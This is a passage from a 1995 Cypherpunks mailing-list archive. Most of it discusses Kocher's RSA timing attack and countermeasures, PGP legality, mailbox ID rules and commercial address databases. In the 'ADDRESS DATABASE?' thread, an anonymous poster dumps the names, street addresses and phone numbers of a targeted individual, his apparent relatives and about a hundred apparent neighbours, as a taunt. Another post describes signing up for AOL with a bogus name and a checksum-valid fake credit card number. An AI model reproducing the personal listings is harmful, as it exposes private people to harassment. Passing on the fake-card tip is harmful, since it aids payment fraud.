hand, your smartcard or PC is still at risk, since it's _not_ doing a lot of them, unless it's doing them just sort of at random when it's got nothing better to do and throws the real work in the middle. #-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 From black at eng.usf.edu Thu Dec 14 08:26:33 1995 From: black at eng.usf.edu (James Black) Date: Fri, 15 Dec 1995 00:26:33 +0800 Subject: Question about the Timing Attack Message-ID: Hello, I have looked over the paper, but I will look more closely this weekend (finals going on right now). The main question I have, since my programs run over a network with dumb terminals is this: If someone can get the timing information why would they need it, since they can read the message. So how can this attacker get the timing info without being able to read the message (unencrypted)? Thanx. ========================================================================== James Black (Comp Sci/Comp Eng sophomore) e-mail: black at eng.usf.edu http://www.eng.usf.edu/~black/index.html ************************************************************************** From sandfort at crl.com Thu Dec 14 08:34:28 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Fri, 15 Dec 1995 00:34:28 +0800 Subject: ADDRESS DATABASE? Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, Something of privacy interest happened to me yesterday. I phoned a company to ask for a copy of their catalog. The phone clerk asked for my last name and zip code. After receiving that info, the clerk asked me, "Is this your full name and address?" and then gave them both correctly. I was taken aback. I have been at my new address for only a couple of months. Prior to that, I have been couch surfing for a year and a half. Though I called an 800 number, ANI had nothing to do with it since I was calling from work. It may have been from a database associated with a credit reporting agency, a bank or a utility company, but I am not aware of any of these being available on-line for something as mundane as requesting a consumer catalog. The clerk had no idea where the info came from (or so he said). Does anyone know how this trick was done? S a n d y P.S. If anyone is interested in helping to make an adult film, drop me a note. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From jim at bilbo.suite.com Thu Dec 14 09:10:11 1995 From: jim at bilbo.suite.com (Jim Miller) Date: Fri, 15 Dec 1995 01:10:11 +0800 Subject: Attacking Clipper with timing info? Message-ID: <9512140222.AA23036@bilbo.suite.com> > Without having the details of the algorithm, I suspect > the answer is 'remotely possible, at best'. > > However, to extend what I suspect you were getting at: > > It would be very interesting to determine if the NSA knew > about this crypto-design problem... > That was indeed what I was wondering. I expect we wont have to wait too long before we hear whether Clipper chips require the same or a different amount of time to encrypt/decrypt. Should be interesting. Jim_Miller at suite.com From SADLER_C at HOSP.STANFORD.EDU Thu Dec 14 09:23:58 1995 From: SADLER_C at HOSP.STANFORD.EDU (Connie Sadler) Date: Fri, 15 Dec 1995 01:23:58 +0800 Subject: Kocher's Paper Message-ID: Hi... Can someone tell me where I can get a copy of Kocher's paper? I haven't read it yet. Thanks! Connie From hoz at univel.telescan.com Thu Dec 14 09:32:22 1995 From: hoz at univel.telescan.com (rick hoselton) Date: Fri, 15 Dec 1995 01:32:22 +0800 Subject: Timing Cryptanalysis Attack Message-ID: <9512141637.AA11479@toad.com> At 03:42 PM 12/14/95 +0100, Lars Johansson wrote: >>Does the attack work for existing smartcards? >At first glance, smart cards would seem to be the most critical target >to Kocher's timing attack since they usually operate in on-line >environments. Not just on-line, they also operate in untrusted (hostile?) environments. >...the terminal could get a (noisy) measure of the time by > repeatingly use this command to see when the result is available. Might a terminal also be able to monitor power consumption or electromagnetic emissions to obtain a more precise time estimate? >Most smart cards does nevertheless require that the user must first >specify a PIN code before the RSA algorithms are operationable. If I used my RSA card every day, (at a toll booth, for instance), and the "bad guys" pilfered an "exact" timing upon each use, how long before they could forge a signature? >This implies that even if the card gets stolen can't it be attacked >with Kocher's method. That is useful, but if I know my card is stolen, I can presumably limit my liability by reporting it. If I still have my card, but my secret key is stolen, then damage might be greater. On another note, timing attacks would not seem to work against most DES implementations, hardware or software. The time to execute each round does not seem to depend on the plaintext or the key. It could be made to, of course, but unless I'm missing something, the "natural" way to code it, or to construct hardware for it, is not time dependent. Rick F. Hoselton (who doesn't claim to present opinions for others) From dreschs at austnsc.tandem.com Thu Dec 14 09:35:21 1995 From: dreschs at austnsc.tandem.com (Sten Drescher) Date: Fri, 15 Dec 1995 01:35:21 +0800 Subject: kocher's timing attack In-Reply-To: Message-ID: <55loofy5qn.fsf@galil.austnsc.tandem.com> On Firewalls, "Jonathan M. Bresler" said: JMB> regarding kocher's timing attack paper: JMB> RSA attack. only known ciphertext is needed. dont know how many JMB> known ciphertexts are required (related to key size surely). the JMB> paper's example is digital signature, rephrase that to Alice signs JMB> Bob's public key certifying that (you know the story). After JMB> several large key signing parties hundreds of known ciphertexts JMB> could have been generated using Alice's key--each one a public key JMB> of someone else. over several years it piles up. the known JMB> ciphertexts can be tested/analyzed to yield Alice's secret key. JMB> ouch. ;/ Are you sure about this? It would seem that the same principle would then apply to signed messages as well, and I find it a bit hard to believe that signing messages would make ones key pair vulnerable. -- #include /* Sten Drescher */ To get my PGP public key, send me email with your public key and Subject: PGP key exchange Key fingerprint = 90 5F 1D FD A6 7C 84 5E A9 D3 90 16 B2 44 C4 F3 From marina at commtouch.co.il Thu Dec 14 10:10:13 1995 From: marina at commtouch.co.il (marina kats) Date: Fri, 15 Dec 1995 02:10:13 +0800 Subject: PGP Interoperability? Message-ID: <9512141007.AA00520@commtouch.co.il> Can anyone out there vouch for the interoperability of PGP 2.6 ui with versions of PGP available in USA from MIT & Viacrypt. What about the legal issue ? Is it legal for a US citizen to encrypt or check signatures with a 2.6ui public key ? Would sending a public key out of the US be reagarded as export by ITAR? Thanks Geoff Klein. From mab at research.att.com Thu Dec 14 10:26:49 1995 From: mab at research.att.com (Matt Blaze) Date: Fri, 15 Dec 1995 02:26:49 +0800 Subject: CryptoLib 1.0 now available In-Reply-To: <199512140448.VAA18190@bogart.Colorado.EDU> Message-ID: <199512140526.AAA27695@nsa.tempo.att.com> > >> CryptoLib includes the following: >[...] >> quantization (Defense against Kocher's timing attack) >> quantized RSA, DSA and El Gamal private key operations. > > >Maybe this is an incorrect conclusion, but here seems to be a _second_ group >who knew about Kocher's timing attack before Kocher did. What on earth >would ECash or ATT have to gain by keeping such knowledge a secret? > > -- Will > > Although it's very tempting to come up with an elaborate confession to being part of the big conspiracy of the powers-that-be to suppress our most brilliant cryptologic discoveries, I must admit that in fact you have reached an incorrect conclusion. I added the quantization stuff to CryptoLib over the weekend right after I read Kocher's paper. I posted the routines to cypherpunks and sci.crypt yesterday. You must have missed it. Also, it should be pointed out that the idea that timing information can leak information (like bit density) about keys has been well-known for a long time. I understand that NSA cryptosystems have long required fixed response time for some (but not all...) cryptographic primitives in comsec equipment. But understanding that timing information might be a threat in principle is not the same as understanding how to exploit it in practice. Kocher's observations are very, very surprising. -matt From wam at fedex.com Thu Dec 14 10:46:44 1995 From: wam at fedex.com (William McVey) Date: Fri, 15 Dec 1995 02:46:44 +0800 Subject: Digital Sigs and the Bar Committee Message-ID: <199512141730.AA09473@gateway.fedex.com> This was found on Netwatchers (http://www.ionet.net/~mdyer/front.shtml), and I figured there would be people on this list willing to comment. -- William McVey BAR COMMITTEE PROPOSES DIGITAL SIGNATURE GUIDELINES The Information Security Committee of the Science and Technology Section of the American Bar Association has promulgated proposed Digital Signature Guidelines, and is inviting comment through January 15, 1996. You can download the compressed ASCII file at the NetWatchers site, subject to the copyright notice below, or you can download the text in various formats from the ECL site at http://www.intermarket.com/ecl/. From nobody at REPLAY.COM Thu Dec 14 10:57:26 1995 From: nobody at REPLAY.COM (Anonymous) Date: Fri, 15 Dec 1995 02:57:26 +0800 Subject: ADDRESS DATABASE? Message-ID: <199512141740.SAA13977@utopia.hacktic.nl> -----BEGIN PGP SIGNED MESSAGE----- Sandy Sandfort 7:51 AM 12/14/95 (not completely in this order): >Something of privacy interest happened to me yesterday. I phoned >a company to ask for a copy of their catalog. The phone clerk >asked for my last name and zip code. After receiving that info, >the clerk asked me, "Is this your full name and address?" and >then gave them both correctly. I was taken aback. That is the correct response. >Does anyone know how this trick was done? What trick? For ~$150, you can buy a CD-ROM-set DB with every listed phone number in the U.S. on it, faxes too; the info's rife with typos and has a lag of ~6-7 months, but what do you want? If you're willing to pay more, you'll get more -- more accurate, more timely, more aggressively correlated, more thorough info. >I have been at my new address for only a couple of months. Prior Where's your new address, under a rock? ;) >to that, I have been couch surfing for a year and a half. Though Ironically, NFA status will get you on some very aggressive lists. >I called an 800 number, ANI had nothing to do with it since I was >calling from work. It may have been from a database associated >with a credit reporting agency, a bank or a utility company, but [x] all of the above >I am not aware of any of these being available on-line for They are. >something as mundane as requesting a consumer catalog. The clerk ^^^^^^^ Are you being serious? Ever heard of "information markets"? What, are you a libertarian just because you don't like taxes? There are other reasons for being one... :) >had no idea where the info came from (or so he said). Detweiler L Detweiler L S Detweiler Larry 8525 E Hampden Ave 3704 S 2nd St 2884 Ww Ave Denver CO Austin TX Parnell IA 80231-4826 78704-7073 52325-8825 303-695-0497 512-448-1750 319-628-4461 Detweiler Lynn Detweiler Lynn Detweiler Lynn Teenline 1724 N Alabama St 1045 W Forevergreen Rd North Liberty IA Silver City NM North Liberty IA 52317 88061-4302 52317-9717 319-626-6272 505-538-2776 319-626-8216 PS. Unless your postscript (in the classical sense) about getting help making an adult film was a pickup line, maybe you could talk to one of Detweiler's neighbors about it... Allen Michael L 8525 E Hampden Ave Denver, CO 80231-4826 303-750-6855 Allerheiligen Shane & Robin 8525 E Hampden Ave Denver, CO 80231-4826 303-338-5250 Ambrosino Greg 8525 E Hampden Ave Denver, CO 80231-4826 303-338-5723 Anderson Michael W 8525 E Hampden Ave Denver, CO 80231-4826 303-696-1057 Armour Lyles 8525 E Hampden Ave Denver, CO 80231-4826 303-743-0933 Auslen James 8525 E Hampden Ave Denver, CO 80231-4826 303-671-5129 Baker Barbara 8525 E Hampden Ave Denver, CO 80231-4826 303-751-4451 Banks Mark 8525 E Hampden Ave Denver, CO 80231-4826 303-671-9228 Banner K 8525 E Hampden Ave Denver, CO 80231-4826 303-750-4587 Barison Joseph 8525 E Hampden Ave Denver, CO 80231-4826 303-743-9661 Becker Michelle 8525 E Hampden Ave Denver, CO 80231-4826 303-745-0320 Beckler Barbara 8525 E Hampden Ave Denver, CO 80231-4826 303-745-8793 Belloni Beecky 8525 E Hampden Ave Denver, CO 80231-4826 303-671-5114 Bennett Tim 8525 E Hampden Ave Denver, CO 80231-4826 303-337-2903 Berlin T A 8525 E Hampden Ave Denver, CO 80231-4826 303-745-0541 Berthonnaud Jon 8525 E Hampden Ave Denver, CO 80231-4826 303-751-7496 Biery Timothy 8525 E Hampden Ave Denver, CO 80231-4826 303-755-5589 Bond H M 8525 E Hampden Ave Denver, CO 80231-4826 303-369-5513 Bosworth Lisa 8525 E Hampden Ave Denver, CO 80231-4826 303-743-8447 Budd Edward K 8525 E Hampden Ave Denver, CO 80231-4826 303-752-9749 Chlopek Joanna 8525 E Hampden Ave Denver, CO 80231-4826 303-752-4647 Coleman Warren 8525 E Hampden Ave Denver, CO 80231-4826 303-695-4761 Cormier Keith 8525 E Hampden Ave Denver, CO 80231-4826 303-750-1783 Cox R 8525 E Hampden Ave Denver, CO 80231-4826 303-337-5744 Dayton C 8525 E Hampden Ave Denver, CO 80231-4826 303-750-5281 Dietz Scott 8525 E Hampden Ave Denver, CO 80231-4826 303-750-6657 Dillon C 8525 E Hampden Ave Denver, CO 80231-4826 303-338-5495 Donaldson Jennifer 8525 E Hampden Ave Denver, CO 80231-4826 303-750-7681 Dooley Patricia F 8525 E Hampden Ave Denver, CO 80231-4826 303-750-5443 Duke Alison 8525 E Hampden Ave Denver, CO 80231-4826 303-671-7286 Elizondo Arthuro 8525 E Hampden Ave Denver, CO 80231-4826 303-338-0348 Erfman Jeff 8525 E Hampden Ave Denver, CO 80231-4826 303-755-7570 Farris J 8525 E Hampden Ave Denver, CO 80231-4826 303-696-1283 Faulkner Theresa 8525 E Hampden Ave Denver, CO 80231-4826 303-750-6341 Fernandes Roland C 8525 E Hampden Ave Denver, CO 80231-4826 303-750-1650 Fouse Sue 8525 E Hampden Ave Denver, CO 80231-4826 303-750-0015 Fox J 8525 E Hampden Ave Denver, CO 80231-4826 303-337-5960 Gaffney Walter R 8525 E Hampden Ave 1513 Denver, CO 80231 303-368-9245 Goodell Brooke 8525 E Hampden Ave Denver, CO 80231-4826 303-755-5765 Graham Calvin 8525 E Hampden Ave Denver, CO 80231-4826 303-750-5853 Grant Dallas 8525 E Hampden Ave Denver, CO 80231-4826 303-671-7792 Grosskreutz Vicki 8525 E Hampden Ave Denver, CO 80231-4826 303-745-1905 Hewett Vern 8525 E Hampden Ave Denver, CO 80231-4826 303-751-5786 Higgins Scott 8525 E Hampden Ave Denver, CO 80231-4826 303-696-8126 Howard W 8525 E Hampden Ave Denver, CO 80231-4826 303-745-9591 Howe Josh 8525 E Hampden Ave Denver, CO 80231-4826 303-337-6322 Huggins Scott 8525 E Hampden Ave Denver, CO 80231-4826 303-745-6627 Hunt Derek 8525 E Hampden Ave Denver, CO 80231-4826 303-755-7306 Hunter Lisa 8525 E Hampden Ave Denver, CO 80231-4826 303-338-5505 Jackson J C 8525 E Hampden Ave Denver, CO 80231-4826 303-750-2418 Jensen J A 8525 E Hampden Ave Denver, CO 80231-4826 303-750-1906 Kiolbasa Mike 8525 E Hampden Ave Denver, CO 80231-4826 303-338-9216 Klein Misty 8525 E Hampden Ave Denver, CO 80231-4826 303-745-3986 Leiker Ron 8525 E Hampden Ave Denver, CO 80231-4826 303-671-9558 Lenard P 8525 E Hampden Ave Denver, CO 80231-4826 303-751-3253 Lopez Jennifer 8525 E Hampden Ave Denver, CO 80231-4826 303-337-1765 Marinella Michelle D 8525 E Hampden Ave Denver, CO 80231-4826 303-751-3645 Mclane William T 8525 E Hampden Ave Denver, CO 80231-4826 303-337-6035 Mcqueen Mike 8525 E Hampden Ave Denver, CO 80231-4826 303-750-7483 Milbrath Jeff 8525 E Hampden Ave Denver, CO 80231-4826 303-750-7925 Moffit S L 8525 E Hampden Ave Denver, CO 80231-4826 303-369-2964 Murchison Rob 8525 E Hampden Ave Denver, CO 80231-4826 303-368-1260 Nash Jesse H 8525 E Hampden Ave Denver, CO 80231-4826 303-752-1141 Nichols Keith 8525 E Hampden Ave Denver, CO 80231-4826 303-337-0062 Palesch Mindi 8525 E Hampden Ave Denver, CO 80231-4826 303-671-5177 Parker L 8525 E Hampden Ave Denver, CO 80231-4826 303-750-4587 Peterson N C 8525 E Hampden Ave 720 Denver, CO 80231 303-752-4807 Plunkett Lisa A 8525 E Hampden Ave Denver, CO 80231-4826 303-338-5986 Plybon Jonathan 8525 E Hampden Ave Denver, CO 80231-4826 303-671-0681 Reynolds Robert 8525 E Hampden Ave Denver, CO 80231-4826 303-337-3489 Richey Robert 8525 E Hampden Ave Denver, CO 80231-4826 303-338-9074 Sabourin William & Tasha 8525 E Hampden Ave Denver, CO 80231-4826 303-745-6005 Sanborn Bruce E 8525 E Hampden Ave Denver, CO 80231-4826 303-752-1838 Schroeder Paul 8525 E Hampden Ave Denver, CO 80231-4826 303-671-5231 Sears Marc & Denise 8525 E Hampden Ave Denver, CO 80231-4826 303-745-2958 Shaw R 8525 E Hampden Ave Denver, CO 80231-4826 303-696-7014 Short Maynard P 8525 E Hampden Ave Denver, CO 80231-4826 303-671-5647 Shriner Christopher S 8525 E Hampden Ave Denver, CO 80231-4826 303-695-0806 Sicles T A 8525 E Hampden Ave Denver, CO 80231-4826 303-750-5744 Sinks Curt E 8525 E Hampden Ave Denver, CO 80231-4826 303-671-8118 Smith J H 8525 E Hampden Ave Denver, CO 80231-4826 303-338-5438 Smith Marc G 8525 E Hampden Ave Denver, CO 80231-4826 303-750-8531 Sorrell Larry W 8525 E Hampden Ave Denver, CO 80231-4826 303-695-4778 States Michael W 8525 E Hampden Ave Denver, CO 80231-4826 303-750-7416 Steward E C 8525 E Hampden Ave Denver, CO 80231-4826 303-337-3259 Sullivan K 8525 E Hampden Ave Denver, CO 80231-4826 303-755-9989 Sunburst Apartments 8525 E Hampden Ave Denver, CO 80231-4826 303-750-0124 Terry Robert D 8525 E Hampden Ave Denver, CO 80231-4826 303-745-4287 Triplette J 8525 E Hampden Ave Denver, CO 80231-4826 303-369-7795 Vestal Patrick J 8525 E Hampden Ave Denver, CO 80231-4826 303-671-0245 Whaley Leigh 8525 E Hampden Ave Denver, CO 80231-4826 303-755-1915 White Epsie 8525 E Hampden Ave Denver, CO 80231-4826 303-337-1368 Williams Myrtle M 8525 E Hampden Ave Denver, CO 80231-4826 303-695-1074 Winfield Kurt 8525 E Hampden Ave Denver, CO 80231-4826 303-755-4306 Zullo Marie J 8525 E Hampden Ave 117 Denver, CO 80231 303-368-1057 - ------------- That took about 15 seconds, but I'm a fast typer. YMMV. Hieronymous (*not* one of LD's neighbors) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBVAwUBMNBgWr3g0mNE55u1AQEugwH8DKWGsVXd9tfK97RICTeddGJUuQFFwrP3 WoQXrrxNcvGRQ8bzZ3ANH1FPAAiCt7WB+8OF3MA20H/Ma1XuiU8ljw== =QTb4 -----END PGP SIGNATURE----- From warlord at MIT.EDU Thu Dec 14 11:18:16 1995 From: warlord at MIT.EDU (Derek Atkins) Date: Fri, 15 Dec 1995 03:18:16 +0800 Subject: Kocher's RSA attack In-Reply-To: <9512141640.AA22375@zorch.w3.org> Message-ID: <199512141815.NAA26051@toxicwaste.media.mit.edu> > Further to Roger's comments that modular multiplies in software probably do > not allow the timing attacks. I must disagree, software implementations of RSA can and probably do allow the timing attacks. It all depends on the modexp implementation. Most implementations that I know of, when performing an x^y mod n will require a squarings and b multiplies, where a is the number of bits in y and b is the number of 1-bits in y. You iterate through the bits of y. For each bit you square x, and if the bit is 1 you multiply it into an accumulator. Paul's attack can determine if this multiply is done or not, given perfect timing conditions, in 2 ciphertexts per bit. This CAN happen in software, and it does in implementations like RSAREF. In fact, I'm fairly sure that PGP's MPILib would be subject to this attack if it weren't for all the other randomness involved in PGP. The point is that just because an implementation is in software does not mean you should be sloppy in your protections against this attack. We should change implementations, both in software and hardware, to defeat this attack. Making operations run in constant time seems to be the best way to defeat this attack. Yes, we should also look at other possible attacks. Covert channels in a workstation environment are important, but they have nothing to do with Paul's particular attack. It would be interesting to see how one could use covert challens to gain the timing information needed to make this attack, howver. I have a few ideas. -derek From pcw at access.digex.net Thu Dec 14 11:21:17 1995 From: pcw at access.digex.net (Peter Wayner) Date: Fri, 15 Dec 1995 03:21:17 +0800 Subject: EMF loopholes and [Re: Kocher's RSA attack] Message-ID: > >A conclusion which might be reached is that smartcards should >in future contain >contain a timer which is started at the beginnin of every cryptographic >operation and a delay loop introduced to ensure that the time taken is always >the same. The alternative of attempting to ensure that equal processing is >spent on each cycle threatens an infinite regress into second and third order >effects, eg frequency of page faults. Covert channel analysis is bad enough >as it is. > I remember the first computer I built had a neat wireless "sound card" built in. The radio waves generated by the processor could be modified by choosing the instructions executed. So you could get sound for your computer games by putting a radion next to the machine! The delay loops for the games contained multiple paths for different sounds. It was actually pretty good for the time. This leads me to believe that a delay loop might not be good enough. The leakage from the smart card could be enough to identify when the card entered the delay loop. The difference between the signal could be significant. Just a thought. -Peter From EALLENSMITH at ocelot.Rutgers.EDU Thu Dec 14 11:32:00 1995 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Fri, 15 Dec 1995 03:32:00 +0800 Subject: e-mail forwarding, for-pay remailers Message-ID: <01HYSRU3EHHW8Y4ZOH@mbcl.rutgers.edu> From: IN%"stewarts at ix.netcom.com" "Bill Stewart" 14-DEC-1995 03:22:12.75 >There are two different sets of relevant rules in the US - Post Office and state. The PO's primary interest is making sure you don't mind if they don't forward your mail once you stop using the Commercial Mail Receiving Agent (CMRA) and secondarily that you aren't committing fraud by using the mailbox, sending people change-of-address notices, ripping off your creditors, and skipping town. California has a hopelessly dishonest law that just went into effect in 1995, which pretends to be designed to protect consumers from fraud by the 7 million small businesses in CA that uses mailboxes, and actually requires that _anybody_, business or not, who wants to rent a mailbox must fill out the Post Office form and also appoint the PO or CMRA as their agent for service of process and give them up-to-date True Addresses. The PO, meanwhile, "usually wants" a California Driver's License plus another ID to rent a box from them. (I didn't have such a thing when I last rented a box, and the PO hassled my mailbox company into asking for one when the new law came out.) After many attempts at calling the PO to get anybody who knows the _official_ rules for what ID is required, I found a PO lawyer who told me the rules are in the "Domestic Mail Manual", which any Postmaster has, so my next step is to look up one of those before I next get a mailbox. So maybe a random photo ID will work, such as your FooBar Consulting Employee ID, and maybe it won't, depending on what state you live in and how clueless your local Post Office bureaucrats are. ----------------- The more critical question is likely to be what the people at the local MBE/whatever _think_ the rules are. When I last got a box (under my real name, in case anyone's wondering), I seem to recall that they'd accept credit cards. Once one has one box under a given name, this opens up the possibility of getting a secured credit card to make future access easier. However, I believe that they do want at least one form of photo ID; I can't remember just off what their specifications were. -Allen From hallam at w3.org Thu Dec 14 11:35:34 1995 From: hallam at w3.org (hallam at w3.org) Date: Fri, 15 Dec 1995 03:35:34 +0800 Subject: Kocher's RSA attack In-Reply-To: Message-ID: <9512141640.AA22375@zorch.w3.org> Further to Roger's comments that modular multiplies in software probably do not allow the timing attacks. On the internet the randomness introduced by the network probably hides the timing of the cryptography. I say probably because I am at a conference and have not got the maths texts to hand. I would guess however that Shanon's paper on communications bandwidth and some empirical results on the timing characteristics of the network would allow one to demonstrate that the attack is infeasible. On the other hand the attack is quite likely to work against some smart cards. In particular there are many which do not have specialized modular multiplication facilities. These use software to implement bignum arithmetic. Since smartcards also tend to be slow processors the arithmetic may well have been speeded up with the type of optimisation been speeded up in an RSAREF type manner. A conclusion which might be reached is that smartcards should in future contain contain a timer which is started at the beginnin of every cryptographic operation and a delay loop introduced to ensure that the time taken is always the same. The alternative of attempting to ensure that equal processing is spent on each cycle threatens an infinite regress into second and third order effects, eg frequency of page faults. Covert channel analysis is bad enough as it is. Perhaps we should concentrate on the question of how the timing attack bight be used in a workstation environment. Here covert channels are very relevant - with the proviso that we do not have a process concealment problem but a security partitioning problem. Consider the problem of a cryptographic file store where the users do not have access to a private key used to make files accessible. I suggest that we attempt to break out these attacks into categories, label the categories and produce a companion guide to the attack paper describing its system level implications. I beleive that such a task is best done in a collaborative medium such as this list. We need as many people as possible to consider the possible attack modes. Nobody is likely to think of them all. Phill From llurch at networking.stanford.edu Thu Dec 14 12:00:43 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Fri, 15 Dec 1995 04:00:43 +0800 Subject: e-mail forwarding, for-pay remailers In-Reply-To: <199512140742.XAA06927@ix13.ix.netcom.com> Message-ID: On Wed, 13 Dec 1995, Bill Stewart wrote: > wrote: > > >I believe C2.org already offers non-dialup access accounts, paid for > >with ECash, that do not require a valid snail-address or phone-number. > >I am sure that there will be many more to come. > > I suspect Sameer would be happy to open an account paid in advance in > small unmarked bills. AOL probably wouldn't. AOL will, however, accept a bogus name, address, and credit card number (as long as the checksum is correct) for the initial ten free hours plus however long it takes for the first bill to bounce. America "On Line" will also accept direct debits from an untraceable bank account (for this they charge a little extra). This is not to say that I have tried any of this (though I have), nor is it to say that anything on AOL is worth your time anyway. > Fortunately, the government > hasn't really caught on to the importance of email, so they aren't requiring > that email providers know where you really live. I predict 1997 for that. This promises to be an interesting legal fight. -rich From anon-remailer at utopia.hacktic.nl Thu Dec 14 12:20:43 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Fri, 15 Dec 1995 04:20:43 +0800 Subject: [NOISE] Re: Netscape announces position against GAK Message-ID: <199512141900.UAA16686@utopia.hacktic.nl> On 14 Dec 1995 08:20:46, amp writes (in part): >i'm not entirely satisfied with netscape's response, but then, i >didn't expect to be. i _expect_ weasling from corporations that have >made the 'big time'. this is the way life is i suppose. what i'd like >to see would be more companies that have an interest in the security --snip-- >amp ><0003701548 at mcimail.com> (since 10/31/88) > >Current PGP Key = 57957C9D >December 13, 1995 18:51 i cannot fault you too much for not using capitals, since it is a well know fact that network mci charges extra for their use. however, i do believe that your posts might be taken more seriously were they easier to read. maybe it is time to shell out the extra $$ and buy some capital letters. hooker From turner at TeleCheck.com Thu Dec 14 12:40:01 1995 From: turner at TeleCheck.com (turner at TeleCheck.com) Date: Fri, 15 Dec 1995 04:40:01 +0800 Subject: ADDRESS DATABASE? In-Reply-To: Message-ID: <9512141932.AA09881@mercury.telecheck.com> sandfort at crl.com said: > C'punks, > Something of privacy interest happened to me yesterday. I phoned a > company to ask for a copy of their catalog. The phone clerk asked > for my last name and zip code. After receiving that info, the clerk > asked me, "Is this your full name and address?" and then gave them > both correctly. I was taken aback. Taken aback? Its only going to get worse in the future. As Telcos, credit card companies, etc., start looking for new ways to make money I think selling information about you will increase dramatically. Just think, with new and improved "interactive TV" you will be able to get commercials tailored to your purchasing habits (A doctor would get an commercial for an expensive car, while Joe Sixpacks would get the Ford Fiestiva). > I have been at my new address for only a couple of months. Prior to > that, I have been couch surfing for a year and a half. Though I > called an 800 number, ANI had nothing to do with it since I was > calling from work. It may have been from a database associated with > a credit reporting agency, a bank or a utility company, but I am not > aware of any of these being available on-line for something as > mundane as requesting a consumer catalog. The clerk had no idea > where the info came from (or so he said). Does anyone know how this > trick was done? You might be the victim of the CD-ROM phone-book people, but I doubt it if you have a new address (the versions lag 6+ months). Telcos like Soutern Bell and South Western Bell are now offering directory lookup service to corporate customers on a per-lookup charge. I think we signed on for our collections department to find delinquent individuals. Perhaps even more frightening is that we now access to account information from the Star network. With your I.D., we can do a hit to see if your account is still open, closed, overdrawn, or in good standing. I wonder how long it will be before it is repackaged giving account balances. ... be afraid... > S a n d y > P.S. If anyone is interested in helping to make an adult film, > drop me a note. From jpp at software.net Thu Dec 14 13:35:35 1995 From: jpp at software.net (John Pettitt) Date: Fri, 15 Dec 1995 05:35:35 +0800 Subject: ADDRESS DATABASE? Message-ID: <199512142032.MAA17978@software.net> At 01:32 PM 12/14/95 -0600, turner at TeleCheck.com wrote: > >Just think, with new and improved "interactive TV" you will be able to >get commercials tailored to your purchasing habits (A doctor would get >an commercial for an expensive car, while Joe Sixpacks would get the Ford >Fiestiva). > > I'm doing it now - software.net serves distinct ads to Mac, Windows, Text and Unix based browsers. On the name database side the PO runs somthing called National Change of Address which tracks who moved where and allows direct marketing companys to clean their lists. Almost everybody sells address change data (utilities, the PO, credit companys) - I'm getting tons of "welcome to the neighbourhood" mail since I moved. John Pettitt jpp at software.net "why not, and who said so?" From stewarts at ix.netcom.com Thu Dec 14 13:56:43 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 15 Dec 1995 05:56:43 +0800 Subject: ADDRESS DATABASE? Message-ID: <199512142108.NAA03208@ix12.ix.netcom.com> At 01:32 PM 12/14/95 -0600, you wrote: >sandfort at crl.com said: >> Something of privacy interest happened to me yesterday. I phoned a >> company to ask for a copy of their catalog. The phone clerk asked >> for my last name and zip code. After receiving that info, the clerk >> asked me, "Is this your full name and address?" and then gave them >> both correctly. I was taken aback. > > Taken aback? Its only going to get worse in the future. As Telcos, credit >card companies, etc., start looking for new ways to make money I think >selling information about you will increase dramatically. I'm in the process of moving and getting new phones, and Pac Bell asked me if it was ok to send my Social Security Number to my long-distance carrier. I told them "no, but you don't have my SSN anyway" "Oh, you're right, we don't; can we have it" "No" "OK. Would you be willing to give us your driver's license number or another form of ID? We've just started asking for this recently." "Is it required?" "No, it's optional, but I have to ask" "No, thanks" Sounds like you're right about them getting into the info-selling business. #-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 From andreas at artcom.de Thu Dec 14 14:06:32 1995 From: andreas at artcom.de (Andreas Bogk) Date: Fri, 15 Dec 1995 06:06:32 +0800 Subject: Timing Cryptanalysis Attack In-Reply-To: <9512141637.AA11479@toad.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >>>>> "rick" == rick hoselton writes: rick> On another note, timing attacks would not seem to work rick> against most DES implementations, hardware or software. The rick> time to execute each round does not seem to depend on the rick> plaintext or the key. It could be made to, of course, but rick> unless I'm missing something, the "natural" way to code it, rick> or to construct hardware for it, is not time dependent. Someone mentioned measuring power consumption instead of execution time. I think the same statistics should apply in that case. Of course this attack requires knowledge of the chip design, but that should be possible to gain. It's certainly easier than reading information from a protected EEPROM. Andreas -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAgUBMNCQGEyjTSyISdw9AQEt6wP+LWttWh2i9S8G/zvjU0cM0Rcw4uA/JGRo Qb0QrTfEZ6NI/oCWe4JTZCEQCgGZJ9ApoZMERHTGi4568dD3Cn3jZCkGVYfbeYxq ShOij0DaxkrjaRTsRgmhHVainB1bv5JE3heXYYRgGTLIDkclGtayz8VON3Yr7Oop mSBr/Fot5B4= =YOEs -----END PGP SIGNATURE----- From jlasser at rwd.goucher.edu Thu Dec 14 15:09:50 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Fri, 15 Dec 1995 07:09:50 +0800 Subject: e-mail forwarding, for-pay remailers In-Reply-To: Message-ID: On Thu, 14 Dec 1995, Rich Graves wrote: > > I suspect Sameer would be happy to open an account paid in advance in > > small unmarked bills. AOL probably wouldn't. > > AOL will, however, accept a bogus name, address, and credit card number > (as long as the checksum is correct) for the initial ten free hours plus > however long it takes for the first bill to bounce. Nope. Not anymore. Due to excessive fraud, they now check the credit card information when you first provide it. (This made it impossible for a client to subscribe on the day after Thanksgiving, because AOL couldn't get through to the credit verification through all the shoppers...) For any nontrivial denomination, this leads me to believe that ecash will be verified when online, not offline later. Jon ------------------------------------------------------------------------------ Jon Lasser (410)494-3072 Visit 